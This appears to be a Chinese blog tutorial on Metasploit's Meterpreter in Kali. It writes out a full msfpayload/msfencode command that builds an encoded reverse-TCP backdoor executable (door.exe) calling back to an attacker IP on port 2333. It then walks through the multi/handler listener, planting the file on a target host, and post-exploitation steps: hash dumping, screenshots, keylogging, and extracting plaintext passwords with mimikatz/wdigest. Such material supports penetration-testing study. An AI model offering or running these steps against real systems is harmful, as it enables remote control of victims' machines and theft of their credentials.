1. 程式人生 > >kali漏洞利用之Meterpreter介紹

kali漏洞利用之Meterpreter介紹

這裡寫圖片描述
使用示例:

1.生成Meterpreter後門

命令語句如下,如果其中的IP為kali攻擊機的IP地址,後面跟著的是引數。

msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe

 這個語句中,如果不知道引數是什麼,可以在metasploit中檢視,檢視方式如下
 

use exploit/multi/handler

用這個exp來接受返回的連結

這裡寫圖片描述
然後檢視引數

LHOST是返回的IP地址,也就是我們kali的地址,而LPORT我們設定的是2333,所以也要將其改為2333.

set LPORT 2333

設定好了之後,就可以執行命令了  
這裡寫圖片描述
執行成功,可以看到主目錄下出現了door.exe檔案

然後我們將該door.exe植入到對方的主機上,先不啟動,回到metasploit中,設定LHOST為kali的IP地址,然後開啟handler
這裡寫圖片描述

這裡寫圖片描述
這時在本地kali的2333埠上,就在等待一個返回的payload連結

啟動靶機上的door.exe,kali就能成功的連線上靶機了

這裡寫圖片描述
meterpreter引數可以用help命令打印出來,比如執行sysinfo檢視系統資訊
這裡寫圖片描述
hashdump,抓取雜湊
這裡寫圖片描述
螢幕截圖screenshot
這裡寫圖片描述
鍵盤記錄keyscan_start
這裡寫圖片描述


然後輸入keyscandump就可以記錄下來在靶機上的輸入了

擴充套件工具
這裡寫圖片描述
例如mimikatz可以用來抓取系統的明文
這裡寫圖片描述

wdigest可以獲取憑據
這裡寫圖片描述
可以看到直接抓取到了密碼明文